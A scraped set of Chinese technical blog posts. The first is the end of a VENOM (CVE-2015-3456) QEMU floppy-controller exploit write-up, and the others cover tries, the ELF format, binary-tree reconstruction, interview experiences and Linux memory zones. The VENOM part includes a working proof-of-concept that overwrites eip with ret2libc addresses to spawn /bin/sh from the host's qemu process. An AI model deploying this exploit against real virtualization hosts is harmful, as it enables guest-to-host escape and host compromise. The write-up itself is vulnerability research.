<p>Setting ASLR aside, I used plain ret2lib: call system to run /bin/sh. I had been wondering how to arrange the argument, and thought I might even need a stack pivot, when it dawned on me that the overwritten callback is followed immediately by its argument. Perfect — I only needed to find the address of /bin/sh and place it right after eip. The figure below shows locating the system function and the "/bin/sh" string.</p>
<p><img src="/assets/img/venom/7.png" alt="" /></p>
<p>Below is the third version of the poc.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <sys/io.h>
#include <stdio.h>
#define FIFO 0x3f5
int main()
{
int i;
iopl(3);
outb(0x08e,0x3f5);
for(i = 0;i < 1515;i++)
outb(0x42,0x3f5);
outb(0x10,0x3f5);
outb(0xce,0x3f5);
outb(0xe6,0x3f5);
outb(0xb7,0x3f5);
outb(0xb8,0x3f5);
outb(0x50,0x3f5);
outb(0xe1,0x3f5);
outb(0xb7,0x3f5);
for(i = 0;i < 50;++i)
outb(0x44,0x3f5);
return 0;
}
</code></pre></div></div>
<p>The final result: run the poc in the guest, and the corresponding qemu process on the host spawns /bin/sh.</p>
<p><img src="/assets/img/venom/8.png" alt="" /></p>
<p><img src="/assets/img/venom/9.png" alt="" /></p>
<h3>7. Open issues</h3>
<ol>
<li>The poc can only run once per VM boot; running it again requires recompiling. When first reproducing the bug it sometimes crashed and sometimes did not, and I suspected the overwritten eip position was unstable (a heap overflow plus ASLR, after all). It turned out that after each run the poc's contents were zeroed out, so rerunning it after restarting the VM naturally did nothing — hence recompiling every time. My guess was that when the VM crashes, the kernel is left in a bad state and the image of the running process gets wiped. I wrote a test program with a while(1) loop, ran it, then ran the poc — and the test binary was indeed zeroed, confirming the guess. This is genuinely awkward and not easy to solve; one hacky workaround that comes to mind is to have the poc copy itself before running.</li>
<li>ASLR. If ASLR can be bypassed, building the rest of the ROP chain should not be a big problem, and arbitrary code execution should be achievable — which makes this bug quite serious.</li>
</ol>
<h3>8. Problems encountered and solutions</h3>
<ol>
<li>Locating eip. I had never hand-written an exp on Linux, only used metasploit; on Windows I always used Immunity Debugger to find eip, but here I could only binary-search by hand.</li>
<li>I tried staging shellcode on the heap, but some bytes in the middle of the payload were occasionally overwritten — presumably the process touches some heap data as it runs. Something to watch out for when staging payloads.</li>
</ol>
<h3>9. References</h3>
<ol>
<li><a href="http://blogs.360.cn/blog/venom-%E6%AF%92%E6%B6%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88qemu-kvm-cve%E2%80%902015%E2%80%903456%EF%BC%89/">VENOM “毒液”漏洞分析(qemu kvm CVE‐2015‐3456)</a></li>
</ol>
<p>Incidentally, 360's technical blog is excellent; I have learned a great deal there from mj, pjf, wowocock and the other experts.</p>
<ol>
<li><a href="http://drops.wooyun.org/tips/6597">一步一步学ROP之linux_x86篇</a></li>
</ol>
Trie trees and Word Puzzles2014-11-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/11/07/trie-tree-word-puzzles
<p>I recently ran into a word-puzzle problem in a book: given a letter grid and a list of words, find the words in the grid along any of the 8 directions (horizontal, vertical, diagonal). For example, given the following words and the grid below (this is an OJ problem):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MARGARITA, ALEMA, BARBECUE, TROPICAL, SUPREMA, LOUISIANA, CHEESEHAM, EUROPA, HAVAIANA, CAMPONESA
</code></pre></div></div>
<p><img src="/assets/img/trie/1.jpg" alt="" /></p>
<p>The first three words are marked above.</p>
<p>The simplest approach is brute-force matching: scan the grid once for each word. But the efficiency is clearly unacceptable. After some reading online, a Trie tree turns out to be a good solution to this problem. First, a brief introduction to Tries.</p>
<h3>A brief introduction to Tries</h3>
<p>A Trie, also called a dictionary tree, word-lookup tree, or prefix tree, is a multi-way tree structure for fast retrieval: a Trie over English letters is a 26-way tree, over digits a 10-way tree. Typical applications are counting and sorting large numbers of strings (though not only strings), so search-engine systems often use them for word-frequency statistics. Their advantage: they minimize unnecessary string comparisons, and query efficiency can exceed that of a hash table.</p>
<p>A Trie exploits common string prefixes to save storage. In the figure below, the trie stores the 6 strings tea, ten, to, in, inn, int in 10 nodes:</p>
<p><img src="/assets/img/trie/2.jpg" alt="" /></p>
<p>The basic properties of a Trie:</p>
<ul>
<li>The root contains no character; every other node contains exactly one character.</li>
<li>The string corresponding to a node is the concatenation of the characters along the path from the root to that node.</li>
<li>The children of any node contain distinct characters.</li>
</ul>
<p>Below is a simple Trie implementation; with the figure above, the code should be easy to follow.</p>
<p><img src="/assets/img/trie/3.png" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define ALPHABET_SIZE 26
struct node
{
int data;
struct node *link[ALPHABET_SIZE];
};
struct node *create_node()
{
struct node *q = (struct node*)malloc(sizeof(struct node));
for (int i = 0; i < ALPHABET_SIZE; ++i)
{
q->link[i] = NULL;
}
q->data = -1;
return q;
}
void insert_node(struct node* root, char *key)
{
int length = strlen(key);
struct node *q = root;
int i = 0;
for (i = 0; i < length; ++i)
{
int index = key[i] - 'a';
if (q->link[index] == NULL)
{
q->link[index] = create_node();
}
q = q->link[index];
}
q->data = i;
}
int search(struct node *root, char *key)
{
struct node *q = root;
int length = strlen(key);
int i = 0;
for (i = 0; i < length; ++i)
{
int index = key[i] - 'a';
if (q->link[index] != NULL)
q = q->link[index];
else
break;
}
if (key[i] == '\0' && q->data != -1)
return q->data;
return -1;
}
void del(struct node *root)
{
if(root == NULL)
return;
for (int i = 0; i < ALPHABET_SIZE; ++i)
{
del(root->link[i]);
}
free(root);
}
int main()
{
struct node *root = create_node();
insert_node(root, "by");
insert_node(root, "program");
insert_node(root, "programming");
insert_node(root, "data structure");
insert_node(root, "coding");
insert_node(root, "code");
printf("Search value:%d\n", search(root, "code"));
printf("Search value:%d\n", search(root, "geeks"));
printf("Search value:%d\n", search(root, "coding"));
printf("Search value:%d\n", search(root, "programming"));
del(root);
}
</code></pre></div></div>
<h3>Word Puzzles</h3>
<p>The main idea: first build a Trie from the word list, then from every cell of the grid, in each direction, search brute-force and check whether the path exists in the Trie. Since I personally dislike globals, I wrote it in C++, with some C++11 — C++11 code really is slick.</p>
<p>The input:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>20 20 10
QWSPILAATIRAGRAMYKEI
AGTRCLQAXLPOIJLFVBUQ
TQTKAZXVMRWALEMAPKCW
LIEACNKAZXKPOTPIZCEO
FGKLSTCBTROPICALBLBC
JEWHJEEWSMLPOEKORORA
LUPQWRNJOAAGJKMUSJAE
KRQEIOLOAOQPRTVILCBZ
QOPUCAJSPPOUTMTSLPSF
LPOUYTRFGMMLKIUISXSW
WAHCPOIYTGAKLMNAHBVA
EIAKHPLBGSMCLOGNGJML
LDTIKENVCSWQAZUAOEAL
HOPLPGEJKMNUTIIORMNC
LOIUFTGSQACAXMOPBEIO
QOASDHOPEPNBUYUYOBXB
IONIAELOJHSWASMOUTRK
HPOIYTJPLNAQWDRIBITG
LPOINUYMRTEMPTMLMNBO
PAFCOPLHAVAIANALBPFS
MARGARITA
ALEMA
BARBECUE
TROPICAL
SUPREMA
LOUISIANA
CHEESEHAM
EUROPA
HAVAIANA
CAMPONESA
</code></pre></div></div>
<p>20 is the grid size and 10 the number of words</p>
<p>Output: coordinates + direction</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0 15 G
2 11 C
7 18 A
4 8 C
16 13 B
4 15 E
10 3 D
5 1 E
19 7 C
11 11 H
</code></pre></div></div>
<p>The code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
#include <fstream>
#include <vector>
#include <algorithm>
#include <iterator>
#include <string>
#include <tuple>
using namespace std;
struct Node
{
int data;
struct Node *child[26];
};
class WordPuzzles
{
public:
WordPuzzles(ifstream &in);
void insert_node(string word, int num);
void search_words(int x, int y, int dir);
void do_work();
private:
Node *create_node()
{
Node *q = new Node();
q->data = -1;
for (int i = 0; i < 26; ++i)
{
q->child[i] = NULL;
}
return q;
}
static int dx[8];//direction offsets
static int dy[8];
int row, col, counts;
vector<string> wordmap, words;
vector<tuple<int, int, int, char>> ans;
Node *root;
};
int WordPuzzles::dx[] = { -1, -1, 0, 1, 1, 1, 0, -1 };
int WordPuzzles::dy[] = { 0, 1, 1, 1, 0, -1, -1, -1 };
WordPuzzles::WordPuzzles(ifstream &in)
{
in >> row >> col >> counts;
printf("the row is:%d,col is:%d,counts is:%d\n", row, col, counts);
for (int i = 0; i < row; ++i)
{
string str;
in >> str;
wordmap.push_back(str);
}
cout << "the map is " << endl;
copy(wordmap.begin(), wordmap.end(), ostream_iterator<string>(cout, "\n"));
for (int i = 0; i < counts; ++i)
{
string str;
in >> str;
words.push_back(str);
}
cout << "the words is " << endl;
copy(words.begin(), words.end(), ostream_iterator<string>(cout, "\n"));
root = create_node();
for (vector<string>::iterator it = words.begin(); it != words.end(); ++it)
{
insert_node(*it, it - words.begin());
}
}
void WordPuzzles :: insert_node(string word, int num)
{
Node *q = root;
for (int i = 0; i < word.size(); ++i)
{
int index = word[i] - 'A';
if (q->child[index] == NULL)
{
q->child[index] = create_node();
}
q = q->child[index];
}
q->data = num;
}
void WordPuzzles::search_words(int x,int y,int dir)
{
Node *q = root;
int xtmp = x, ytmp = y;
while (xtmp >= 0 && xtmp < row && ytmp >= 0 && ytmp < col)
{
if (!q->child[wordmap[xtmp][ytmp] - 'A'])
break;
else
q = q->child[wordmap[xtmp][ytmp] - 'A'];
if (q->data != -1)
{
ans.push_back(make_tuple(q->data,x, y, dir));
q->data = -1;
}
xtmp += dx[dir];
ytmp += dy[dir];
}
}
void WordPuzzles::do_work()
{
for (int i = 0; i < row; ++i)
{
for (int j = 0; j < col; ++j)
{
for (int k = 0; k < 8; ++k)
search_words(i, j, k);
}
}
sort(ans.begin(), ans.end(),
[](const tuple<int, int, int, char>& a, const tuple<int, int, int, char> &b)
{
return get<0>(a) < get<0>(b);
});
for (auto &it : ans)
{
cout << get<1>(it) << " " << get<2>(it) << " " << (char)(get<3>(it) +'A') << endl;
}
}
int main()
{
ifstream in("word.txt");
WordPuzzles wp(in);
wp.do_work();
}
</code></pre></div></div>
A brief introduction to the ELF file format2014-11-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/11/02/elf
<p>ELF stands for Executable and Linkable Format, a file format used for executables, object files, and libraries, similar to the PE format on Windows. ELF was developed and published by UNIX System Laboratories as an ABI (Application Binary Interface) and has long been the standard format on Linux.
This post walks through the ELF format using the simple program below; reading it alongside the program's binary is recommended.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <stdlib.h>  /* for exit() */
int add(int a,int b)
{
printf("Number are added together\n");
return a + b;
}
int main()
{
int a,b;
a = 3;
b = 4;
int ret = add(a,b);
printf("Result:%u\n",ret);
exit(0);
}
gcc test.c -o test
gcc test.c -c -o test.o
</code></pre></div></div>
<h3>1. ELF overview</h3>
<p>ELF covers three main file types:</p>
<ul>
<li>Relocatable files: the .o files produced by the compiler and assembler, consumed by the linker</li>
<li>Executable files: the linker's output from processing .o files, the process image</li>
<li>Shared object files: dynamic library .so files</li>
</ul>
<p>Examples of the three types:</p>
<p><img src="/assets/img/elf/1.png" alt="" /></p>
<p>The layout of an ELF file:</p>
<p><img src="/assets/img/elf/2.png" alt="" /></p>
<p>As the figure shows, an ELF file conceptually comprises 5 parts:</p>
<ul>
<li>
<p>ELF header: describes basic information such as the architecture and operating system, and gives the locations of the section header table and program header table within the file</p>
</li>
<li>
<p>program header table: the execution view of the ELF file, mainly describing the segments; unused during assembly and linking</p>
</li>
<li>
<p>section header table: holds the information for every section; the compile/link view of the ELF file</p>
</li>
<li>
<p>sections: the individual sections themselves</p>
</li>
<li>
<p>segments: the segments as they exist at run time</p>
</li>
</ul>
<p>Note that, as explained above, sections and segments actually occupy the same bytes: the difference is the linking view versus the loading view. The left side of the figure is the link view and the right side the execution view. Sections are visible to the programmer and are a concept for the linker, while segments are invisible to the programmer and are a concept for the loader; generally one segment contains several sections. Windows PE has no such program header table and section header table split — everything is unified as sections, processed at load time. Accordingly, in ELF both the program header table and the section header table are optional.</p>
<h3>2. The structure of an ELF file</h3>
<p>Before diving in, here are the sizes of the various data types used in the definitions.</p>
<p><img src="/assets/img/elf/3.png" alt="" /></p>
<h4>(1) ELF header</h4>
<p>The ELF header describes basic information such as the architecture and operating system and tells where the section header table and program header table live in the file; see the comments for each member.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define EI_NIDENT 16
typedef struct{
/* ELF identification bytes, fixed values */
unsigned char e_ident[EI_NIDENT];
/* object file type: 1 relocatable, 2 executable, 3 shared object, etc. */
Elf32_Half e_type;
/* target architecture: 3 = Intel 80386 */
Elf32_Half e_machine;
/* object file version: 1 = current */
Elf32_Word e_version;
/* virtual address of the program entry point; may be 0 if there is none */
Elf32_Addr e_entry;
/* file offset of the program (segment) header table; 0 if none */
Elf32_Off e_phoff;
/* file offset of the section header table; 0 if none */
Elf32_Off e_shoff;
/* processor-specific flags associated with the file */
Elf32_Word e_flags;
/* size of the ELF header, in bytes */
Elf32_Half e_ehsize;
/* size of one program header table entry, in bytes */
Elf32_Half e_phentsize;
/* number of program header table entries */
Elf32_Half e_phnum;
/* size of one section header table entry, in bytes */
Elf32_Half e_shentsize;
/* number of section header table entries */
Elf32_Half e_shnum;
/* index in the section header table of the section name string table */
Elf32_Half e_shstrndx;
}Elf32_Ehdr;
</code></pre></div></div>
<p>A quick note on the last field: e_shstrndx, the final member of Elf32_Ehdr, is short for "Section header string table index". The section-name string table is itself an ordinary section of the ELF file, usually named ".shstrtab"; e_shstrndx is the index of ".shstrtab" in the section header table.</p>
<p>Below are the values of the ELF header members for test:</p>
<p><img src="/assets/img/elf/4.png" alt="" /></p>
<p>We can read this ELF's basics here — architecture and operating system; the section header table has 30 sections starting at offset 4420, 40 bytes each; the program header table has 9 segments, 32 bytes each. Next, the same data viewed as raw bytes, with some of the structures marked so you can match them against the struct above.</p>
<p><img src="/assets/img/elf/5.png" alt="" /></p>
<h4>(2) program header table and program header entry</h4>
<p>The program header table is the loading view of the ELF file; object files do not have one. Each entry gives a segment's size and position in the virtual and physical address spaces, its flags, access permissions, and alignment. As seen above, test has 9 segments:</p>
<p><img src="/assets/img/elf/6.png" alt="" /></p>
<p>A brief description of some of them:</p>
<ul>
<li>PHDR holds the program header table itself</li>
<li>INTERP names the interpreter that must be invoked once the executable has been mapped from the file into memory. Interpreter here does not mean the binary's contents are interpreted by another program; it refers to a program that satisfies unresolved references by linking in other libraries — usually /lib/ld-linux.so.2, /lib/ld-linux-ia-64.so.2, and the like, which map the dynamic libraries the program needs into the virtual address space. For nearly every program the C standard library must be mapped, plus whatever else is required: GTK, the math library, libjpeg, and so on</li>
<li>LOAD marks a segment to be mapped from the binary into the virtual address space, holding constant data (such as strings), the program's object code, and so on.</li>
<li>DYNAMIC holds information used by the dynamic linker (i.e., the interpreter specified in INTERP).</li>
<li>NOTE holds vendor-specific information</li>
</ul>
<p>Each entry corresponds to one segment and is described by the following structure:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct
{
/* segment type: PT_LOAD = 1, a loadable segment */
Elf32_Word p_type;
/* offset from the start of the file to the segment's first byte */
Elf32_Off p_offset;
/* virtual address at which the segment's first byte is placed in memory */
Elf32_Addr p_vaddr;
/* meaningless on Linux; holds the same value as p_vaddr */
Elf32_Addr p_paddr;
/* bytes the segment occupies in the file image */
Elf32_Word p_filesz;
/* bytes the segment occupies in the memory image */
Elf32_Word p_memsz;
/* segment flags */
Elf32_Word p_flags;
/* alignment constraint on p_vaddr */
Elf32_Word p_align;
} Elf32_phdr;
</code></pre></div></div>
<h4>(3) section header table and section header entry</h4>
<p>The section header table covers the file's sections. Each section has a type that defines the semantics of its data, plus a size and an offset within the binary. As seen above, test has 30 sections:</p>
<p><img src="/assets/img/elf/7.png" alt="" /></p>
<p>A brief description of some of them:</p>
<ul>
<li>.interp holds the interpreter's file name as an ASCII string</li>
<li>.data holds initialized data — ordinary program data that can be modified at run time</li>
<li>.rodata holds read-only data that can be read but not modified; for instance, the compiler places all static strings appearing in printf statements in this section</li>
<li>.init and .fini hold the code used at process initialization and termination, usually added automatically by the compiler</li>
<li>.gnu.hash is a hash table that allows fast access to symbol table entries without a linear scan of the whole table</li>
</ul>
<p>A section is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct{
/* section name */
Elf32_Word sh_name;
/* section type: PROGBITS program-defined contents, NOBITS occupies no file space (bss), REL relocation entries */
Elf32_Word sh_type;
/* flag bits: whether the section's contents are writable, executable, etc. */
Elf32_Word sh_flags;
/* if the section appears in the process's memory image, the address of its first byte */
Elf32_Addr sh_addr;
/* offset of the section's first byte from the start of the file */
Elf32_Off sh_offset;
/* section size in bytes; for NOBITS nonzero yet occupying no file space */
Elf32_Word sh_size;
/* section header table index link */
Elf32_Word sh_link;
/* extra section information */
Elf32_Word sh_info;
/* address alignment constraint for the section */
Elf32_Word sh_addralign;
/* for sections holding fixed-size entries, such as a symbol table, the size of each entry */
Elf32_Word sh_entsize;
}Elf32_Shdr;
</code></pre></div></div>
<p>That is the rough structure of ELF; when time permits I will summarize a few of the more important sections.</p>
Reconstructing a binary tree from traversal sequences2014-10-30T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/30/binary-tree-traversals
<p>Binary tree traversals generally come in three kinds (preorder, inorder, postorder); the problem is to reconstruct the tree from any two of the sequences. In general, "preorder + inorder" and "inorder + postorder" each determine the tree uniquely, while "preorder + postorder" does not. <a href="http://www.binarythink.net/2012/12/binary-tree-info-theory/">This article</a> explains this qualitatively from an information-theoretic angle. (Most of what follows is collected from around the web; I have merely synthesized it.)</p>
<p>We discuss the three cases in turn.</p>
<p>1. Given the preorder and inorder sequences</p>
<p>1. Determine the root: it is the element of the current tree that appears first in the preorder sequence.</p>
<p>2. Split into subtrees: find the root's position in the inorder sequence; everything to its left is the left subtree, everything to its right the right subtree. If either side of the root is empty, that subtree is empty; if both sides are empty, the root is a leaf.</p>
<p>3. Recurse: treat the left and right subtrees each as a binary tree and repeat steps 1-3 until every node has been placed.</p>
<p>2. Given the postorder and inorder sequences</p>
<p>1. Determine the root: it is the element of the current tree that appears last in the postorder sequence.</p>
<p>2. Split into subtrees: find the root's position in the inorder sequence; everything to its left is the left subtree, everything to its right the right subtree. If either side of the root is empty, that subtree is empty; if both sides are empty, the root is a leaf.</p>
<p>3. Recurse: treat the left and right subtrees each as a binary tree and repeat steps 1-3 until every node has been placed.</p>
<p>The code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdlib.h>
#include <stdio.h>
#include <string.h>
typedef struct _node
{
int v;
struct _node* left;
struct _node* right;
}node;
char pre[50] = "ABDHLEKCFG";
char mid[50] = "HLDBEKAFCG";
char post[50] = "LHDKEBFGCA";
int Possition(char c)
{
return strchr(mid,c) - mid;
}
node* root1;//globals here mainly for ease of debugging
node* root2;
//i: index in pre[] of the first character of the subtree's preorder sequence
//j: index in mid[] of the first character of the subtree's inorder sequence
//len: length of the subtree's character sequence
void PreMidCreateTree(node **root,int i,int j,int len)
{
int m;
if(len <= 0)
return;
*root = (node*)malloc(sizeof(node));
(*root)->v = pre[i];
(*root)->left = NULL;
(*root)->right = NULL;
m = Possition(pre[i]);
PreMidCreateTree(&((*root)->left),i+1,j,m-j);//be very careful with the recursion ranges
PreMidCreateTree(&((*root)->right),i+(m-j)+1,m+1,len-1-(m-j));
}
//i: index in post[] of the last character of the subtree's postorder sequence
//j: index in mid[] of the first character of the subtree's inorder sequence
//len: length of the subtree's character sequence
void MidPostCreateTree(node **root,int i,int j,int len)
{
int m;
if(len <= 0)
return;
*root = (node*)malloc(sizeof(node));
(*root)->v = post[i];
(*root)->left = NULL;
(*root)->right = NULL;
m = Possition(post[i]);
MidPostCreateTree(&((*root)->left),i-1-(len-1-(m-j)),j,m-j);
MidPostCreateTree(&((*root)->right),i-1,m+1,len-1-(m-j));
}
void PreOrder(node *root)
{
if(root)
{
printf("%c",root->v);
PreOrder(root->left);
PreOrder(root->right);
}
}
void PostOrder(node *root)
{
if(root)
{
PostOrder(root->left);
PostOrder(root->right);
printf("%c",root->v);
}
}
int main()
{
node *root2= NULL;
PreMidCreateTree(&root1, 0, 0, strlen(mid));
PostOrder(root1);
printf("\n");
MidPostCreateTree(&root2, strlen(post)-1, 0, strlen(mid));
PreOrder(root2);
printf("\n");
return 0;
}
</code></pre></div></div>
<p>3. Given the preorder and postorder sequences</p>
<p>In general this does not determine the tree uniquely, but we can count how many tree shapes are possible.</p>
<p>Start with a simple example: preorder ABCD, postorder CBDA.</p>
<p>(1) The first letter of the preorder and the last letter of the postorder must both be the root, A</p>
<p>(2) The second letter of the preorder, B, must also be the root of some subtree (left or right is undetermined). B must appear last within its subtree in the postorder sequence, so by finding B's position in the postorder we get all the nodes of the left subtree, namely B and C; the remaining D is then the right subtree's node</p>
<p>(3) Analyze the left subtree BC and the right subtree D the same way. D is a single root, so its shape is unique; BC has only one child subtree, which could be either left or right</p>
<p>(4) Finally, count the nodes with exactly one child subtree (say n); by the product rule the answer is pow(2,n)</p>
<p>Now generalize to arbitrary binary trees</p>
<p>First we need a few variables:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pre[50]; // the preorder array
post[50]; // the postorder array
length; // length of the arrays
count; // number of nodes with exactly one child subtree
</code></pre></div></div>
<p>(1) If length == 1, the result is obviously unique</p>
<p>(2) With more than one node there are subtrees, and necessarily pre[0] == post[length-1]. If pre[1] == post[length-2], then positions 1 through length-1 all form a single subtree of pre[0] — whether left or right cannot be determined — so count++. Then treat the remaining pre[1] to pre[length-1] and post[0] to post[length-2] as a new tree</p>
<p>(3) If pre[1] != post[length-2], there are clearly both left and right subtrees (split post into left and right at the position equal to pre[1]); process each as an independent subtree</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char pre[50];//= "ABDHLEKCFG";
char mid[50];//= "HLDBEKAFCG";
char post[50];//= "LHDKEBFGCA";
int count;
void calc(int prebeg,int preend,int postbeg,int postend)
{
int i;
if(prebeg>=preend)
return;
for(i = postbeg; i <= postend - 1; ++i)
{
if(pre[prebeg+1]==post[i])
break;
}
if(i == postend - 1)
count++;
calc(prebeg+1,prebeg+1+(i-postbeg),postbeg,i);
calc(prebeg+1+(i-postbeg)+1,preend,i+1,postend-1);
}
int Pow(int n)
{
int i;
int m = 1;
for(i = 0; i < n; i++)
{
m *= 2;
}
return m;
}
int main()
{
int length;
scanf("%s", pre);
scanf("%s", post);
length = strlen(pre);
count = 0;
calc(0,length-1,0,length-1);
printf("%d\n", Pow(count));
return 0;
}
</code></pre></div></div>
Notes on applying to Intel and VMware2014-10-29T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/10/29/bishimianshi
<p>Last Tuesday (10/21) I went back to campus and happened to spot Intel's written-test notice at the school gate — just bring Chinese and English resumes. Since I will be job hunting next year anyway, I figured I would have a look; foreign companies recruit interns year-round, so maybe I could land an internship.</p>
<p>Few people showed up to Intel's test, probably because they were hiring few people and did little publicity. The test was in Chinese and very basic, clearly low-level oriented: pure C, simple common knowledge like ring 0 versus ring 3, basic algorithm questions; the extra-credit question was in English and also easy. The interview the next day went smoothly. The interviewer was not familiar with virtualization, so I spent a long while explaining Xen and KVM to him. He seemed interested in exploitation, so I moved on to Windows vulnerability exploitation and mitigation. At one point he said, "I won't quiz you on operating systems then," and I said, "as you like." I was full of confidence throughout. He was quite satisfied and said an internship would be no problem, then described me to the manager, who wanted to chat with me in English — my spoken English is hardly reassuring, but since the topic was technical I scraped through. As I left, the manager said she would notify me when a suitable internship came up; I thought that might be the end of it, given how little confidence I have in my spoken English. But the very next day Intel HR called — Malaysia, Dalian and Shanghai all rang; at the time I thought foreign companies really are complicated. Later I learned the Shanghai caller was the manager; she asked why I applied so early (I said I can only start next year) and mentioned they also have campus-hire headcount. Intel is remarkably efficient: test on Tuesday, interview on Wednesday, notification on Thursday, then just paperwork — even my physical exam was scheduled. So the internship is basically settled at Intel.</p>
<p>Now for VMware, a company I have always thought highly of: as the underlying platform of cloud computing, virtualization is a technology I am very bullish on for the coming years. I took part in VMware's campus recruiting last year too; being only a first-year graduate student, neither a job nor an internship was possible, so I coasted into the second round, admitted I was not graduating and could not intern, and the interviewer told me to try again later when I could. VMware's written test is entirely in English, fairly comprehensive and fairly hard — this year it even covered the shellshock bug. My fundamentals carried me through the multiple-choice part, but two programming problems stumped me. I assumed I had failed the test, yet on Monday I was notified of today's interview. It went badly, which is partly why I am writing this. The whole morning I felt half asleep: I wrote a memcpy without even checking for NULL pointers — unbelievable. I said I had done Windows kernel driver development, so the interviewer immediately asked about the Windows boot process, and I hemmed and hawed; I really had half forgotten it, and since my previous work leaned toward security I had not reviewed it carefully. Things felt off from the start. Asked next to explain a kernel NULL-pointer dereference, I was not thorough either — I could not even state confidently that when the exception occurs, a bit in the error code pushed on the stack indicates where it happened (kernel or user mode). All in all I performed very poorly — probably my worst interview in years. VMware is likely a bust; remembering my confident self in last year's first and second rounds, it is quite the irony.</p>
<p>Of these two interviews, one went more smoothly than I could have imagined, the other more embarrassingly. Nothing to add about the smooth one; the embarrassing VMware one tells me I still need to prepare properly — the years of effort have not been wasted, but I must learn to express it. And honestly, it is good that this came just when everything seemed to be going my way. Onward.</p>
An overview of Linux memory management2014-10-12T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/12/linux-vm-overview
<h3>1. The kernel address-space split</h3>
<p>Linux gives the lower 3 GB of the 4 GB virtual address space to user processes and the upper 1 GB to the kernel. While the low part changes across context switches (between user processes), the kernel's high part stays constant. The MMU always uses virtual addresses when translating, and the kernel is no exception. For simplicity, Linux maps physical memory starting at 0 directly to the start of the kernel's virtual range, 0xc0000000, which is very convenient: using 0xc0000001 in the kernel is equivalent to accessing physical unit 1. But this creates a problem: the kernel can directly address only 1 GB of virtual space, so even mapping it all covers only 1 GB of physical memory. On a system with more than 1 GB of RAM, at any moment some memory is necessarily beyond the kernel's direct reach. Moreover, besides memory, the kernel must access many I/O devices. In today's architectures, those devices' resources (registers, on-chip memory, and so on) are generally accessed via MMIO, mapped into the physical address space — so the kernel's 1 GB must also leave room to map these I/O resources; in other words, the kernel must reserve part of its virtual address space for device mappings. With these special uses in mind, the Linux kernel directly maps only 896 MB of physical memory and reserves the top 128 MB of virtual space for other purposes. Hence on a system with more than 896 MB, the memory above 896 MB cannot be reached directly by the kernel — this is the so-called high memory. Does that mean the kernel can never access memory above 896 MB? Of course not: the kernel has the reserved 128 MB of virtual addresses, which it can map dynamically onto high memory. So beyond mapping I/O devices, an important function of the reserved 128 MB is to provide a means of accessing high memory dynamically. Naturally, when physical memory is below 896 MB — say 512 MB — there is no high memory, since all 512 MB is directly mapped by the kernel; in that case the range from 3G+max_phy to 4G serves as the reserved kernel address space described above. ULK throws the 896 MB kernel page tables at the reader right away in chapter 2, which is quite confusing until the concept of high memory is fully understood. Note that only the kernel itself uses high-memory pages specially; to user-space processes, high pages and normal pages are completely indistinguishable — user processes always access memory through page tables, never directly. The figure below shows the kernel's address-space split.</p>
<p><img src="/assets/img/vmoverview/1.png" alt="" /></p>
<p>PAGE_OFFSET is 0xc0000000. The first 896 MB of physical memory is mapped directly into the kernel address space; what follows is high memory, divided into three parts: VMALLOC_START~VMALLOC_END, KMAP_BASE~FIXADDR_START, and FIXADDR_START~4G.
For high memory, a page can be obtained via alloc_page() or similar functions, but to access the actual physical memory the page must still be given a linear address — that is, we must find a piece of linear address space for the page that corresponds to high memory. This process is called high-memory mapping, which we cover in section 3.</p>
<h3>2. Page frames and memory zones</h3>
<p>The page frame, a 4 KB memory region, is the smallest unit of Linux memory management. A frame's information is kept in a page descriptor of type page, and all page descriptors live in the mem_map array — this applies to all physical memory. Memory as a whole is divided into nodes, each associated with one of the system's processors and represented in the kernel by a pg_data_t instance. Nodes are further subdivided into zones. The rough structure:</p>
<p><img src="/assets/img/vmoverview/2.png" alt="" /></p>
<p>Linux divides each memory node's physical memory into three zones: ZONE_DMA, ZONE_NORMAL, and ZONE_HIGHMEM, with the following ranges:</p>
<table>
<thead>
<tr>
<th style="text-align: left">Zone</th>
<th style="text-align: left">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left">ZONE_DMA</td>
<td style="text-align: left">Page frames below 16 MB</td>
</tr>
<tr>
<td style="text-align: left">ZONE_NORMAL</td>
<td style="text-align: left">Page frames above 16 MB and below 896 MB</td>
</tr>
<tr>
<td style="text-align: left">ZONE_HIGHMEM</td>
<td style="text-align: left">Page frames above 896 MB</td>
</tr>
</tbody>
</table>
<p>x86下的Linux使用一致访问内存(UMA)模型,因此Linux中只有一个单独的节点,包含了系统中所有的物理内存。</p>
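上表的三个管理区划分可以写成一个简单的判断函数(16MB/896MB是x86 32位下的典型边界,仅为示意):

```python
MB = 1024 * 1024

def phys_zone(paddr):
    # 根据物理地址判断页框所属的内存管理区
    if paddr < 16 * MB:
        return "ZONE_DMA"
    if paddr < 896 * MB:
        return "ZONE_NORMAL"
    return "ZONE_HIGHMEM"
```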
<h3>三. 高端内存页框的映射</h3>
